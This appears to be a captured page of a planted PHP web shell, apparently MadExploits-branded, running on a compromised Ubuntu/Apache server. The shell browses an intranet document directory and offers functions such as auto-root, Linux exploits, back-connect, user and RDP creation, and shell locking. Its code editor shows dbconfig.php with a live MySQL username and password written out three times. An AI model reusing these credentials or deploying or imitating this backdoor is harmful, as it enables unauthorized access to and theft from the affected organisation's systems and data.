Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
intranetpage /
iiitdinternaldocs /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-x--x
dist
[ DIR ]
drwxr-x--x
documents
[ DIR ]
drwxr-x--x
images
[ DIR ]
drwxr-x--x
js
[ DIR ]
drwxr-x--x
lib
[ DIR ]
drwxr-x--x
plugins
[ DIR ]
drwxr-x--x
DBController.php
739
B
-rwxr-x--x
categorylist.php
2.25
KB
-rwxr-x--x
common.php
2.94
KB
-rwxr-x--x
createCategory.php
3.45
KB
-rwxr-x--x
createOfficeorder.php
9.13
KB
-rwxr-x--x
dashboard.php
3.01
KB
-rwxr-x--x
dbconfig.php
1.25
KB
-rwxr-x--x
get_subcatg.php
500
B
-rwxr-x--x
index.php
3.54
KB
-rwxr-x--x
indexDashboard.php
9.81
KB
-rwxr-x--x
list.php
9.5
KB
-rwxr-x--x
list.php_07032021
10.86
KB
-rwxr-x--x
logout.php
377
B
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dbconfig.php
<?php class Database { private $host = "localhost"; private $db_name = "intranet"; private $username = "intranet"; private $password = "^%$#@!"; public $conn; public function dbConnection() { $this->conn = null; try { $this->conn = new PDO("mysql:host=" . $this->host . ";dbname=" . $this->db_name, $this->username, $this->password); $this->conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch(PDOException $exception) { echo "Connection error: " . $exception->getMessage(); } return $this->conn; } } $DB_HOST = 'localhost'; $DB_USER = 'intranet'; $DB_PASS = '^%$#@!'; $DB_NAME = 'intranet'; try{ $DB_con = new PDO("mysql:host={$DB_HOST};dbname={$DB_NAME}",$DB_USER,$DB_PASS); $DB_con->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch(PDOException $e){ echo $e->getMessage(); } //$connection=mysqli_connect("localhost","username","password","dbname"); $connection=mysqli_connect("localhost","intranet","^%$#@!","intranet"); // Check connection if (mysqli_connect_errno()) { echo "Failed to connect to MySQL: " . mysqli_connect_error(); } ?>
Close